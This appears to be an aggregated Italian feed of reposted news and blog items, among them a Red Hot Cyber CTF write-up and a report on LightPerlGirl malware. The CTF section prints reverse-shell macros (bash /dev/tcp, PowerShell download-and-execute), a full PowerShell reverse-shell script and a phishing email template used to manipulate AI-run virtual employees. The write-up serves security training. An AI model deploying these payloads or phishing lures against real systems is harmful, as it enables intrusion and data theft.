Salta al contenuto principale



SIRIA. Suwayda, tra pietra e resistenza: viaggio in una città che non si piega (Parte 2)


@Notizie dall'Italia e dal mondo
Seconda parte del diario politico dalla "capitale" drusa dove si sperimentano forme di auto-organizzazione ribadendo il legame con il resto del popolo siriano e il rifiuto delle manovre di altri paesi
L'articolo SIRIA. Suwayda, tra



Smallest Gaming Mouse Has Crazy Fast Polling Rate And Resolution


[juskim] wanted to build a tiny mouse, but it couldn’t just be any mouse. It had to be a high-tech gaming mouse that could compete with the best on raw performance. The results are impressive, even if the final build is perhaps less than ideal for pro-level gameplay.

The build riffs on an earlier build from [juskim] that used little more than a PCB and a 3D-printed housing to make a barebones skeleton mouse. However, this one ups the sophistication level. At the heart of the build is the nRF54L15 microcontroller, which is paired with a PAW3395 mouse sensor which is commonly used in high-end gaming mice. It offers resolution up to 26K DPI for accurate tracking, speeds up to 650 ips, and 8 kHz sampling rates. Long story short, if you want fine twitch control, this is the sensor you’re looking for. The sensor and microcontroller are laced together on a custom PCB with a couple of buttons, a battery, and a charging circuit, and installed in a barebones 3D-printed housing to make the final build as small as possible.

The only real thing letting the design down is the mouse’s key feature—the size. There’s very little body to grab on to and it’s hard to imagine being able to play most fast-paced games at a high level with such a tiny device. Nevertheless, the specs are hardcore and capable, even if the enclosure isn’t.

[juskim] loves building tiny peripherals; we’ve featured his fine work before, too. Video after the break.

youtube.com/embed/XgV3BgWfUFY?…


hackaday.com/2025/07/02/smalle…



Se è gratuito, il prodotto sei tu. Google paga 314 milioni di dollari per violazione dei dati agli utenti Android


Google è al centro di un’imponente causa in California che si è conclusa con la decisione di pagare oltre 314 milioni di dollari agli utenti di smartphone Android nello stato. Una giuria di San Jose ha stabilito che l’azienda ha violato i diritti dei proprietari di dispositivi mobili raccogliendo dati dai loro telefoni senza autorizzazione, anche quando i dispositivi erano in modalità standby.

Come ha spiegato l’avvocato dei querelanti, Glen Summers, la decisione del tribunale conferma la gravità delle violazioni commesse da Google e l’equità delle accuse mosse nei suoi confronti. Secondo lui, le azioni dell’azienda hanno costretto milioni di utenti in California a consumare i propri dati mobili, mentre le informazioni raccolte venivano utilizzate a vantaggio dell’azienda stessa, per scopi pubblicitari e altri scopi commerciali.

La class action è stata intentata nel 2019 e sosteneva che Google continuasse a inviare e ricevere dati dai dispositivi Android tramite i suoi servizi anche quando gli utenti non interagivano con i telefoni. Secondo l’accusa, ciò avrebbe interessato circa 14 milioni di californiani.

Gli avvocati di Google hanno insistito sul fatto che non era stato arrecato alcun danno agli utenti. La principale argomentazione dell’azienda era che tutti questi processi erano descritti in anticipo nei termini di utilizzo e nell’informativa sulla privacy che ciascun utente accetta al momento dell’attivazione del dispositivo. Tuttavia, la giuria ha deciso diversamente, a sostegno della posizione dei ricorrenti.

Il portavoce di Google, José Castaneda, ha dichiarato che l’azienda non è d’accordo con la decisione del tribunale e intende presentare ricorso. Ha inoltre osservato che questi processi di raccolta dati sono parte integrante della garanzia della sicurezza, della stabilità e dell’affidabilità dei dispositivi Android.

Una causa simile che coinvolge utenti Android in altri 49 stati degli Stati Uniti è pendente presso il tribunale federale di San Jose. Il processo dovrebbe iniziare nell’aprile 2026. Questa situazione sta diventando l’ultimo episodio di una serie di azioni legali contro le più grandi aziende IT, sempre più accusate di gestione non etica dei dati personali.

Nel caso di Google, non si tratta solo di una questione di privacy, ma anche del fatto che le informazioni siano state raccolte a spese delle risorse degli utenti, il che ha causato ulteriore indignazione.

L'articolo Se è gratuito, il prodotto sei tu. Google paga 314 milioni di dollari per violazione dei dati agli utenti Android proviene da il blog della sicurezza informatica.

Braccio reshared this.



CTF di RHC 2025. Ingegneria sociale in gioco: scopri la quarta “flag” non risolta


La RHC Conference 2025, organizzata da Red Hot Cyber, ha rappresentato un punto di riferimento per la comunità italiana della cybersecurity, offrendo un ricco programma di talk, workshop e competizioni. Tra gli eventi più attesi, spiccano le Capture The Flag (CTF), che hanno coinvolto i partecipanti in sfide avvincenti e realistiche.

Queste CTF hanno portato i partecipanti nel cuore di una crisi geopolitica simulata: una Cyber Warfare Ibrida contro la nazione fittizia di Minzhong, in cui attori malevoli puntavano a sabotare la supply chain e le reti 4G locali. Questa simulazione, realizzata con il contributo di CyberSecurityUP, Hackmageddon e Fondazione Bruno Kessler (FBK), ha spinto i concorrenti a confrontarsi con tematiche moderne come AI, minacce ibride, disinformazione e infrastrutture critiche, alzando l’asticella del realismo tecnico e narrativo.

Una delle CTF più innovative è stata quella dedicata al Social Engineering, organizzata dalla FBK e dall’Università di Trento in collaborazione con il collettivo HackerHood, che ha offerto ai partecipanti un’esperienza immersiva e un approccio rivoluzionario per le sfide CTF, simulando un ambiente realistico gestito dall’intelligenza artificiale, che gli attaccanti potevano compromettere combinando tecniche di manipolazione psicologica con exploit tecnologici.

Una piattaforma di social engineering per una CTF realistica


La CTF sul Social Engineering si è distinta per l’uso innovativo di una piattaforma sperimentale sviluppata in ambito di ricerca. Questa piattaforma, creata da FBK e dall’Università di Trento, ha generato dinamicamente una finta infrastruttura ICT: indirizzi email, utenti fittizi, un servizio di storage cloud e identità virtuali dotate di personalità credibili, in grado di interagire in linguaggio naturale con i partecipanti.

Il cuore della competizione non era l’exploitation tecnica, ma l’inganno: convincere questi “personaggi virtuali” a rivelare informazioni sensibili, cliccare su link o scaricare allegati. Tutto questo grazie all’uso sapiente dell’ingegneria sociale, combinata con l’analisi dei dettagli dell’ambiente simulato.

Il contributo di HackerHood: test e adattamento


Il collettivo HackerHood ha avuto un ruolo essenziale nella riuscita della competizione, contribuendo non solo ad una validazione iniziale di tale piattaforma ma anche all’adattamento della stessa al contesto CTF. Dopo numerose sessioni di test, sono stati migliorati stabilità, scalabilità e credibilità dell’infrastruttura.

I partecipanti si sono trovati davanti a un ecosistema realistico e immersivo, in cui ogni azione produceva reazioni coerenti da parte degli utenti simulati, grazie a un motore di intelligenza artificiale generativa. Questo ha elevato notevolmente il livello di sfida, rendendo ogni interazione una prova di astuzia e precisione linguistica.

Le Flag della CTF: Social Engineering in azione


La CTF si è articolata in una serie di flag a difficoltà crescente, tutte basate sull’ingegneria sociale e sull’interazione con l’ambiente simulato. Ogni flag rappresentava una tappa nel percorso di compromissione dell’infrastruttura aziendale fittizia.

Panoramica delle principali flag


  • Scopri la password di un dipendente
    Obiettivo: convincere un dipendente a rivelare o lasciar trapelare la propria password.
  • Viola il ticket system aziendale
    Obiettivo: scoprire l’indirizzo email nascosto del supporto IT e sfruttarlo per un attacco.
  • Recupera il file “lista-esuberi”
    Obiettivo: ottenere un file riservato presente solo nel sistema di online file sharing.
  • Recupera una password condivisa
    Obiettivo: identificare una mail interna in cui veniva condivisa una password aziendale.
  • Scopri la chiave privata del CEO
    Obiettivo: recuperare una chiave SSH inviata via email, sfruttando altre compromissioni precedenti.


L’ultima sfida irrisolta “Leggi il contenuto del budget aziendale”


Questa flag rappresentava il punto avanzato dell’intera CTF: per ottenerla, i partecipanti dovevano recuperare e leggere un file PDF riservato chiamato budget-aziendale.pdf, presente solo sul laptop Windows del CEO. Il file era protetto da una password nota soltanto a chi avesse risolto la flag “Recupera una password condivisa” nascosta fra le conversazioni di due dipendenti.

L’obiettivo poteva essere raggiunto seguendo due percorsi alternativi, entrambi validi ma di difficoltà diversa:

1. Accesso tramite SSH:

Tramite una campagna di phishing o social engineering, i partecipanti potevano indurre uno qualunque dei “personaggi virtuali” ad aprire una macro malevola o eseguire un payload da un allegato, ottenendo così accesso completo al sistema Linux. Era quindi possibile utilizzare la chiave SSH ottenuta dal completamento della flag “Scopri la chiave privata del CEO” per accedere interattivamente e tramite movimento laterale al laptop del CEO e leggere il file localmente.

Da un punto di vista più pratico, questo può essere riassunto nei seguenti passaggi.

  • Recupero della chiave privata del CEO: accedere alla casella mail del CEO e recuperare la sua chiave privata inviata tramite mail. La chiave era gia’ in possesso se la flag “Scopri la chiave privata del CEO” era gia’ stata completata.
  • Estrazione della chiave privata del CEO: convincere il CEO a fornire il proprio ID, in modo da poter estrarre la chiave privata.
  • Creazione del documento malevolo: creare un documento LibreOffice contenente una macro capace di aprire una reverse shell. Un esempio di macro e’ riportato di seguito.


Function Main
shell("bash -c 'bash -i &> /dev/tcp// 0>&1'")
End Function

  • Invio del payload: inviare una mail ad uno dei dipendenti utilizzanti Linux allegando il file malevolo. Un testo di esempio di tale mail e’ riportato di seguito.


Gentile Utente,in allegato le nuove policy di sicurezza appena approvate. La invitiamo cortesemente a prenderne visione e a procedere alla loro attuazione al fine di migliorare la security posture dell'aziendaRestiamo a disposizione per ogni dubbio e chiarimento.Cordialmente,Il dipartimento IT.

  • Upload della chiave privata del CEO: caricare sul laptop del dipendente la chiave privata del CEO ottenuta in precedenza.
  • Movimento laterale: Utilizzare la shell acquisita sul laptop del dipendente per effettuare un movimento laterale, collegandosi tramite SSH al laptop del CEO mediante l’uso della chiave SSH.
  • Download del file: Esfiltrare il file “budget-aziendale.zip” copiandolo, ad esempio, sul proprio laptop tramite protocollo ftp.
  • Recupero della password per aprire il file: accedere alla casella mail del CEO e recuperare la password necessaria per l’apertura del file. Tale password e’ la soluzione alla flag “Recupera una password condivisa”
  • Apertura del file: Utilizzare la password per poter estrarre il file e leggerne il contenuto.

2. Violazione diretta del laptop del CEO:

Tramite una campagna di phishing o social engineering, i partecipanti potevano indurre il CEO ad aprire una macro malevola o eseguire un payload da un allegato, ottenendo così accesso completo al sistema. Questa strategia era più complicata dal momento che sul portatile Windows era presente un antivirus.Da un punto di vista più pratico, questo può essere riassunto nei seguenti passaggi.

  • Creazione del documento malevolo: creare un documento Microsoft Office contenente una macro capace di aprire una reverse shell. In questo caso era necessario operare delle operazioni di offuscamento sulla macro, poiché il laptop del CEO era protetto da un antivirus capace di bloccare le macro malevole in chiaro. Un esempio di macro in chiaro e’ riportato di seguito.


Sub Auto_Open()
Last = "powershell -exec bypass IEX ((new-object
net.webclient).downloadstring('http:///poc.txt')) -WindowStyle Minimized"
CreateObject("Wscript.Shell").Run Last
End Sub
Il contenuto del file poc.txt per questa macro e’ riportato di seguito.

$client = New-Object System.Net.Sockets.TCPClient("",);$stream=$client.GetStrean();[byte[]]$bytes = 0..655351|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCITEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

  • Invio del payload: inviare una mail al CEO allegando il file malevolo. Un testo di esempio di tale mail e’ riportato al punto d del metodo procedente.
  • Download del file: Esfiltrare il file “budget-aziendale.zip” copiandolo, ad esempio, sul proprio laptop tramite protocollo ftp.
  • Recupero della password per aprire il file: accedere alla casella mail del CEO e recuperare la password necessaria per l’apertura del file. Tale password e’ la soluzione alla flag “Recupera una password condivisa”
  • Apertura del file: Utilizzare la password per poter estrarre il file e leggerne il contenuto.

Entrambe le strategie richiedevano competenze trasversali, tempismo e il corretto uso delle flag ottenute in precedenza: la password del file veniva acquisita solo tramite la flag “Recupera una password condivisa”, e l’accesso al sistema era subordinato a compromissioni precedenti “Scopri la chiave privata del CEO” o “Scopri la password di un dipendente”.

Criticità e caratteristiche


  • Il file non era accessibile tramite il sistema di file sharing in cloud.
  • Era necessario ricostruire correttamente la topologia aziendale per pianificare l’accesso al dispositivo del CEO.
  • Il file conteneva la flag finale, una frase ironica che rifletteva il tema aziendale fittizio della simulazione:
    CTFRHC{{W3_H4V3_NO_M0R3_MON3Y}}


Completamento e Motivi del fallimento


Nonostante il 95% del percorso fosse stato risolto, nessun team è riuscito a ottenere questa flag e secondo una preliminare valutazione i principali motivi sono i seguenti:

  • Gestione del tempo: i partecipanti sono arrivati molto vicini alla soluzione, ma non hanno avuto il tempo sufficiente per completare la catena finale di compromissioni e accessi necessari.
  • Approccio tecnico predominante: molti team hanno preferito concentrarsi sull’identificazione e lo sfruttamento di possibili vulnerabilità tecniche dell’infrastruttura, sottovalutando la componente di social engineering, che in questo scenario era in realtà la chiave per aggirare i controlli e convincere i personaggi virtuali ad agire.
  • Complessità dell’ambiente IA: il comportamento del CEO era gestito da un’IA configurata per ignorare email da contatti esterni, rendendo inefficaci approcci diretti e costringendo i team a cercare vie interne più complesse.


Conclusioni


I commenti raccolti al termine della competizione parlano chiaro: la combinazione di una piattaforma di social engineering realistica ed interazioni dinamiche guidate da intelligenza artificiale ha offerto ai partecipanti un’esperienza nuova e fresca rispetto alle altre sfide disponibili. Tutti i partecipanti erano concordi sul fatto che questo tipo di approccio fosse una ventata d’aria fresca rispetto alle classiche sfide, costringendoli anche a cambiare mentalità e prospettiva per poterla portare a termine.

La sfida ha alzato significativamente l’asticella, non solo in termini tecnici, ma soprattutto per la capacità di simulare scenari credibili, in cui il fattore umano è al centro del gioco. In un’epoca in cui la manipolazione dell’informazione e l’ingegneria sociale sono armi reali, esperienze come questa rappresentano un passo importante verso una formazione più completa, moderna e aderente alla realtà delle minacce informatiche. La sperimentazione ha dimostrato che è possibile fare didattica e ricerca in modo innovativo, coinvolgente e ad alto impatto.

Il presente articolo e le attività descritte sono frutto di una collaborazione tra FBK, Università di Trento ed Hackerhood. Si ringraziano Manuel Roccon, Matteo Bridi, Alessandro Molinari, Domenico Siracusa, Claudio Facchinetti e Daniele Santoro.

L'articolo CTF di RHC 2025. Ingegneria sociale in gioco: scopri la quarta “flag” non risolta proviene da il blog della sicurezza informatica.



LightPerlGirl: Il Malware Invisibile che Sfugge agli Antivirus e Si Attiva con un Click


Un nuovo malware chiamato LightPerlGirl ha attirato l’attenzione degli esperti di sicurezza informatica per il suo insolito e pericoloso schema di penetrazione dei dispositivi. L’attacco si basa sulla tecnica ClickFix : una finta finestra pop-up CAPTCHA che avvia una complessa sequenza di azioni utilizzando PowerShell e metodi che consentono al codice dannoso di nascondersi completamente dalle soluzioni di sicurezza.

Il nome del malware trae ispirazione dalla riga interna del copyright: “Copyright (c) LightPerlGirl 2025“. La campagna di distribuzione del malware è stata notata per la prima volta dai ricercatori di Todyl dopo aver rilevato script PowerShell anomali su un dispositivo client. Questo è diventato il punto di partenza per indagare su un complesso schema di infezione a più fasi in grado di bypassare i meccanismi di difesa tradizionali.

L’infezione inizia visitando un sito compromesso, il più delle volte sulla piattaforma WordPress, come una risorsa di viaggio. Le pagine ospitano codice JavaScript dannoso, mascherato da controllo di sicurezza di provider noti come Cloudflare. Lo script richiama una finestra con un CAPTCHA falso che, interagendo con esso, richiede all’utente di avviarlo tramite la funzione Esegui di Windows, essenzialmente la prima fase dell’attacco.

Questo comando contatta il server C&C all’indirizzo “cmbkz8kz1000108k2carjewzf[.]info”, da cui viene scaricato il seguente script di PowerShell. Viene eseguito interamente in memoria e include tre moduli: HelpIO, Urex ed ExWpL. Ognuno di essi esegue attività specifiche volte a proteggere il malware nel sistema e a renderlo invisibile.

Il modulo HelpIO richiede i diritti amministrativi tramite la finestra UAC standard e aggiunge quindi un’eccezione a Windows Defender per la directory “C:\Windows\Temp”. Ciò consente il salvataggio dei componenti successivi senza generare allarmi nei programmi antivirus. Urex garantisce quindi una presenza persistente nel sistema scaricando un file bat chiamato “LixPay.bat” e posizionandolo nella directory Temp esclusa. Crea inoltre un collegamento all’avvio in modo che venga eseguito a ogni avvio del sistema.

L’elemento più complesso, ExWpL, non utilizza affatto il file system. Decrittografa un assembly .NET codificato in base64 e lo esegue direttamente in memoria utilizzando il metodo System.Reflection.Assembly.Load(). Questo approccio evita qualsiasi interazione con il disco, il che complica notevolmente il rilevamento.

Dopo aver completato tutte le fasi, il malware mantiene una connessione stabile con il server di comando e controllo, consentendo agli aggressori di eseguire comandi in tempo reale e di scaricare nuovi componenti senza lasciare tracce nel file system.

Secondo Todyl, il fattore critico dell’infezione è stata la mancanza di sistemi di protezione degli endpoint sul dispositivo attaccato, che ha consentito l’esecuzione dello script iniziale. Tuttavia, il team dell’azienda è riuscito a isolare l’host infetto utilizzando il proprio SIEM e l’analisi dei log degli script di PowerShell.

La chiave dell’attacco è il coinvolgimento dell’utente. Tutto inizia con un singolo clic su un CAPTCHA “sicuro” che esegue effettivamente il codice. Todyl sottolinea che nessun controllo di sicurezza dovrebbe richiedere l’inserimento manuale di comandi. Inoltre, si raccomanda di installare urgentemente strumenti di protezione completa degli endpoint e di utilizzare gli indicatori di compromissione forniti nel report per condurre un’analisi dell’infrastruttura.

LightPerlGirl è un esempio di come l’elegante ingegneria sociale e la sofisticatezza tecnica si fondano per creare una minaccia che non può essere ignorata.

L'articolo LightPerlGirl: Il Malware Invisibile che Sfugge agli Antivirus e Si Attiva con un Click proviene da il blog della sicurezza informatica.



Reservoir Sampling, or How to Sample Sets of Unknown Size


Selecting a random sample from a set is simple. But what about selecting a fair random sample from a set of unknown or indeterminate size? That’s where reservoir sampling comes in, and [Sam Rose] has a beautifully-illustrated, interactive guide to how reservoir sampling works. As far as methods go, it’s as elegant as it is simple, and particularly suited to fairly sampling dynamic datasets like sipping from a firehose of log events.

While reservoir sampling is simple in principle it’s not entirely intuitive to everyone. That’s what makes [Sam]’s interactive essay so helpful; he first articulates the problem before presenting the solution in a way that makes it almost self-evident.

[Sam] uses an imaginary deck of cards to illustrate the problem. If one is being dealt cards one at a time from a deck of unknown size (there could be ten cards, or a million), how can one choose a single card in a way that gives each an equal chance of having been selected? Without collecting them all first?

In a nutshell, the solution is to make a decision every time a new card arrives: hold onto the current card, or replace it with the new one. Each new card is given a 1/n chance of becoming held, where n is the number of cards we’ve seen so far. That’s all it takes. No matter when the dealer stops dealing, each card that has been seen will have had an equal chance of ending up the one selected.

There are a few variations which [Sam] also covers, and practical ways of applying it to log collection, so check it out for yourself.

If [Sam]’s knack for illustrating concepts in an interactive way is your jam, we have one more to point out. Our own Al Williams wrote a piece on Turing machines; the original “universal machine” being a theoretical device with a read/write head and infinite paper tape. A wonderful companion to that article is [Sam]’s piece illustrating exactly how such a Turing machines would work in an interactive way.


hackaday.com/2025/07/02/reserv…



l'italia, come al solido il paese delle chiacchiere. lavorate schiavi, lavorate.


Quando il populismo si insinua nelle università

@Politica interna, europea e internazionale

Scriveva Giuseppe Prezzolini che “quando sono università non sono popolari e quando sono popolari non sono università”. Sostituendo l’aggettivo popolare con l’aggettivo populista, che indica l’inclinazione ad assecondare gli umori della massa contrapponendoli agli interessi delle élite, si ottiene la fotografia



Anonimato in rete - considerazioni a quattro mani.


@Privacy Pride
Il post completo di Christian Bernieri è sul suo blog: garantepiracy.it/blog/anonimat…
Gli pseudonimi fanno parte di noi, ci servono, ci sono sempre serviti. In battaglia, i nomi scompaiono ed esistono solo gli pseudonimi. È l'unico modo per evitare le rappresaglie sulle famiglie dei combattenti. Nell'arte, gli pseudonimi sono la



Presentazione del libro “A cosa serve il ricordo” di Andrea Apollonio

@Politica interna, europea e internazionale

2 luglio 2025, ore 18:00, Fondazione Luigi Einaudi, Via della Conciliazione 10, ROMA Oltre all’autore interverranno Giuseppe Benedetto, Presidente Fondazione Luigi Einaudi Rocco Gustavo Maruotti, Sostituto procuratore e Segretario ANM Francesco Paolo Sisto, Viceministro




La controrivoluzione del presidente


altrenotizie.org/primo-piano/1…


I piloti israeliani hanno sganciato “bombe inutilizzate” su Gaza durante gli attacchi dell’Iran


@Notizie dall'Italia e dal mondo
Ciò spiega le ondate di potenti attacchi aerei sulla Striscia, ben lontana dal fronte iraniano, registrate il mese scorso
L'articolo I piloti israeliani hanno sganciato “bombe inutilizzate” su Gaza durante gli attacchi

reshared this



l'eredità di trump. cosa ci lascia trump con la sua presidenza? sostanzialmente macerie. le macerie di un occidente unito, le macerie della democrazia usa, le macerie di un dollaro le forte, le macerie e di un'economia usa, le macerie del ricordo di quello che gli usa hanno sempre cercato di essere, senza riuscirci, a cui hanno definitivamente rinunciato. certo adesso non sono più i poliziotti del mondo, ma un ulteriore elemento di caos e disgregazione. e un'europa che potrebbe diventare più forte e autonoma ed esprimere una propria politica continentale. putin certamente ha da gongolare, ma non p così automatico che vada suo vantaggio.


quello che fanno gli usa adesso all'ucraina un giorno potrebbero farlo a noi. davvero vogliamo dipendere dagli usa per la difesa? semplicemente il giorno che non serviremo più...


Come cambia la difesa con la nuova alleanza Rtx-Shield AI

@Notizie dall'Italia e dal mondo

In un settore in cui la velocità di adattamento è diventata un vantaggio operativo, la collaborazione tra Rtx (ex Raytheon Technologies), gigante tradizionale dell’industria della difesa, e Shield AI, società emergente della Silicon Valley sostenuta da venture capital, rappresenta un caso emblematico della convergenza tra



“Lei non tornerà”: donne alawite rapite dalle strade della Siria


@Notizie dall'Italia e dal mondo
Dopo la caduta di Assad in Siria si sono scatenate le violenze contro la comunità dell'ex presidente. Prese di mira numerose donne alawite, rapite e spesso condotte fuori dal paese
L'articolo “Lei non tornerà”: donne alawite rapite dalle strade della Siria proviene da Pagine





#FacciamoChiarezza, è online la nuova sezione sul sito del #MIM per approfondire le tematiche della #scuola rispondendo ad articoli di stampa, contenuti social, dibattiti in corso sull’istruzione e domande frequenti degli utenti.


Trump pronto a “risarcire” Israele se Netanyahu fermerà l’offensiva a Gaza


@Notizie dall'Italia e dal mondo
Il presidente americano offrirà la prossima settimana al premier israeliano la normalizzazione dei rapporti tra Tel Aviv e Damasco
L'articolohttps://pagineesteri.it/2025/07/02/medioriente/trump-pronto-a-risarcire-israele-se-netanyahu-fermera-loffensiva-a-gaza/



tutti si lamentano del caldo e dell'afa. a livorno siamo fortunati. mi informo sull'umidità tutti i giorni e anche stamattina è al di sotto del 50%. siamo fortunati.



Come gocce d'acqua


altrenotizie.org/spalla/10726-…


Ridere di te


youtu.be/fPKURUKzpjI


#Siria, il "rebranding" del terrore


altrenotizie.org/primo-piano/1…


Ora Piaggio batte bandiera turca. La svolta Baykar tra rilancio e sfide industriali

@Notizie dall'Italia e dal mondo

Rilancio del bimotore executive P.180 Avanti, produzione dei droni TB3 e Akinci, creazione di un centro di manutenzione aeronautica di livello europeo per motori e cellule. Sono questi i punti principali del piano industriale di Piaggio Aerospace sotto la gestione Baykar, definito “ambizioso” e sostenuto



Il Pentagono accelera sulla cantieristica. Al via il primo appalto da 5 miliardi

@Notizie dall'Italia e dal mondo

Proseguono gli sforzi della Casa Bianca per rilanciare la cantieristica navale americana, un settore oggi rallentato da colli di bottiglia e ritardi che rischiano di compromettere la postura strategica degli Stati Uniti. A tal fine, il Pentagono ha annunciato




stamattina faceva così caldo che il caffé è uscito da solo


Welcome to my partial life...


pixelfed.uno/nobollo
Shorts

peertube.uno/c/moments_of_life…
Video

mastodon.uno/@nobollo
Spizzichi...

Ci metto la faccia.
...quel che c'è dietro in fondo, conta quasi esclusivamente per me.

Qualche domanda adesso.

Come ti chiami?
- Silvio Domenico.
...ma qualcuno mi chiama anche stronzo...dipende.

Sei credente?
- Si...aspetta!
...a cosa ti riferisci esattamente?

In cosa sei veramente competente?
- Dipende chi ho di fronte.

Cosa ti piace in una donna?
- Che sia una donna, innazitutto.
...con dentro una persona preferibilmente a me compatibile.
Parliamo...di cosa piace a me, ovviamente!

Hai fatto il Militare?
- Si, in Marina...perchè...altrimenti non vengo assunto?

Quale genere musicale preferisci?
- La musica in genere, più quella di una volta...sembra qualunquista, ma non è così.

Cosa o chi vorresti con te su un'isola deserta?
- Un cellulare...appena mi rompo le palle chiamo qualcuno disponibile a venirmi a prendere.

Fatti una domanda e poi risponditi.
- E adesso?
Adesso, passo alla prossima domanda.

Che sorpresa vorresti ricevere?
- La prossima.

Il gusto di gelato che preferisci?
- Pistacchio.

Se tu fossi?
- Altro...non sarei questo.

Il tuo soprannome abituale?
- Nessuno abituale.

Hai mai tradito qualcuno?
- Se esiste un patto...no. Aspettative, si ne ho tradito. Ma, alle volte, quasi sempre...non sai cosa si aspettino gli altri da te...e poi, comunque, quello non lo considero un tradimento.

Sei mai stato tradito da qualcuno?
_ Non pienamente...e comunque, non c'erano patti di sorta..

La parolaccia che ripeti continuamente?
- Alcune in egual misura...forse, cazzo in misura superiore.

La posizione preferita in amore?
- Oggi sono un pò stanco...prego si accomodi...domani, magari si cambia.

Hai mai fatto l'amore con più di una donna contemporaneamente?
- Si...ma era in un sogno.

E con più uomini?
- Salta!!

Qualche aggettivo per descriverti?
- 181 cm,brizzolato,piede 43......in questo modo sono certo di non dire cazzate pseudocerebrali.

Sai essere competitivo?
- Si...se posso.

La tua trasmissione televisiva preferita?
- Serie TV, non tutte le serie, ovviamente.

Centrodestra o centrosinistra?
- Centrosinistra, quando ho voglia di votare...turandomi il naso...come ormai da tempo.


Maradona o Platinì?
- Van Basten.

Seno naturale o rifatto?
- Naturale...certo, se non è alle ginocchia sarebbe meglio...ma naturale indubbiamente.

Hai mai visto un film pornografico?
- Da adulto, mai sino alla fine.
Da ragazzi,al cinema, si arrivava alla fine, ma con un pò di lamentele ai paesi bassi...

Meglio i Beatles oppure i Rolling Stones?
- Eagles.

Il sesso...dove è meglio farlo?
- Dove si riesce.

Ti vedi bello?
- Non mi vedo...sono miope, presbite e lievemente astigmatico...

Più giovane o più vecchio?
- Nel mezzo del cammin...insomma, anche a tre quarti ormai.

Qualcosa di cui ti vergogni?
- Cos'è una terapia di gruppo?

E di cui vai fiero?
- Nonostante il necessario rapporto conflittuale...mio figlio.

Qualche persona che stimi
- Mi sforzo di partire da me...poi altre, in ordine sparso.

La tua macchina?
- Un sedile che mi porta il culo da una parte all'altra.

Cosa avresti voluto saper fare?
- Tra le tante...cantare.

Uno o due ricordi dei primi dieci anni?
- Immensamente,l e notti della vigilia natale.
Quando col mio fratellino...ci si svegliava nel cuore della notte per vedere se era già passato Gesù Bambino, Babbo natale...insomma bastava che passasse qualcuno a lasciare qualcosa di gradito.
E la meraviglia quando i doni erano già sotto l'albero....

Dei secondi?
- Versione romantica...il primo bacio.
Versione erotica...la prima...insomma quella. Questo, in positivo...
...e in negativo...la morte del mio fratellino di cui sopra.

Dei terzi?
- Il matrimonio, ma non la cerimonia o il ricevimento...
Piuttosto,la sensazione del giorno dopo...

Dei quarti?
- La nascita di mio figlio...e per antitesi...la scomparsa di mio Padre.

Dei quinti?
-...un altra immensa e dolorosissima perdita...il Fratellone.

Ricordo importante del Sesto decennio?
Nè parlerò se arriverò a terminarli...e se nè avrò voglia.



Curù – Corale: voci sommerse, storie negate
freezonemagazine.com/articoli/…
Ho il rammarico che i miei colleghi delle Targhe Tenco non abbiano notato, per la cinquina, questo splendido lavoro. C’è un’eco antica e insieme urgentemente contemporanea che risuona nel primo disco delle cantautrici Giana Guaiana (siciliana) e Bruna Perraro (Friulana di nascita), riunite sotto il nome collettivo di Curù. Un nome che suona misterioso e […]
L'articolo


I russi russano
Di Marco Travaglio

Siccome siamo il popolo più ostile al riarmo, la propaganda guerrafondaia è in piena azione per convincerci che non c’è alternativa. I russi avanzano in Ucraina salvo brevi parentesi da 40 mesi, ma ogni attacco è il più terribile di sempre (strano: due mesi fa i russi, tutti homeless ubriachi, avanzavano a dorso di muli e motorini). Anche la frase più banale in russo, tipo il “non ci sconfiggerete” di Lavrov, diventa una “minaccia all’Europa”. Invece non solo Kiev, che almeno è in guerra, ma pure Polonia, Finlandia e i tre Stati baltici che riabilitano le mine antiuomo per spargerle ai confini con Russia e Bielorussia, inviano segnali di pace. Ogni guasto o black-out, incidente o ritardo è colpa degli hacker e cyber-sabotatori russi. Che vantano più avvistamenti della Madonna di Civitavecchia: spingitori di migranti dall’Africa, mandanti di Al Bano e Iva Zanicchi, truccatori di ogni elezione vinta da chi deve perdere, istigatori di proteste pro Pal, autori di fake news sul cancro di Kate e del video di Macron menato dalla moglie, seminatori di merda nella Senna per le Olimpiadi di Parigi, spie che usano “telecamere antistupro” e “di sicurezza”, “antenne sui tetti delle ambasciate”, “droni russi su Cernobbio per spiare il Centro di ricerca Ue o uno stabilimento Leonardo” (si scoprì poi che non erano né droni né russi, ma interferenze nostrane ai sensori antincendio guasti), computer privati (Libero: “Accendi il pc, Putin ti spia”) e persino “Hvaldimir, la balena beluga sospettata di essere una spia russa e trovata morta in Norvegia” (Rep e Libero). Ieri le cronache sul blocco radar che ha mandato in tilt i voli al Nord e sull’ennesima giornata di paralisi dei treni al Centro-Sud erano affiancate da un rapporto degli 007 britannici su “attacchi cyber da Mosca” e da titoli ammiccanti sul “caos trasporti”: come se a spiegarlo non bastasse Salvini.

Non vi dico l’effetto straniante di leggere queste minchiate sul volo Roma-Trieste, atterrato con la consueta ora e mezza di ritardo per “ritardato arrivo dell’aeromobile” (scusa che vale per l’intera giornata, tanto nessuno domanderà mai il perché della ritardata partenza del primo volo che si trascina dietro tutti gli altri), più un ulteriore quarto d’ora perso sulla pista perché non si riusciva a collegare la presa elettrica del velivolo a quella dell’aeroporto. Appena sceso, ho cercato i sabotatori russi armati di tronchesi, ma devono essermi sfuggiti. Strano che nessuno abbia ancora smascherato gli agenti putiniani che han segato i tubi per far crollare l’insegna di Generali sul grattacielo-banana di Milano. Forse perché ormai hanno capito l’antifona: appena giunti in Italia, scoprono che i servizi pubblici e privati riescono a non funzionare benissimo anche senza di loro. E si riposano.



L'#Iran e la deterrenza interconnessa


altrenotizie.org/spalla/10724-…


#Gaza, la fabbrica della morte


altrenotizie.org/primo-piano/1…


Emergenza un hazzo!


@Privacy Pride
Il post completo di Christian Bernieri è sul suo blog: garantepiracy.it/blog/emergenz…
È già capitato di recente. “Io c’ero”, e non ero affatto felice di essere lì, nel centro dell’azione, anzi, nel centro dell’inazione dovuta al blocco totale di tutto ciò che funziona elettricamente. Tuttavia vivere in prima persona l’emergenza energetica spagnola è stato molto istruttivo:

Privacy Pride reshared this.



404 Media is closed this week. School's out.

404 Media is closed this week. Schoolx27;s out.#PSA

#psa #x27


#NotiziePerLaScuola
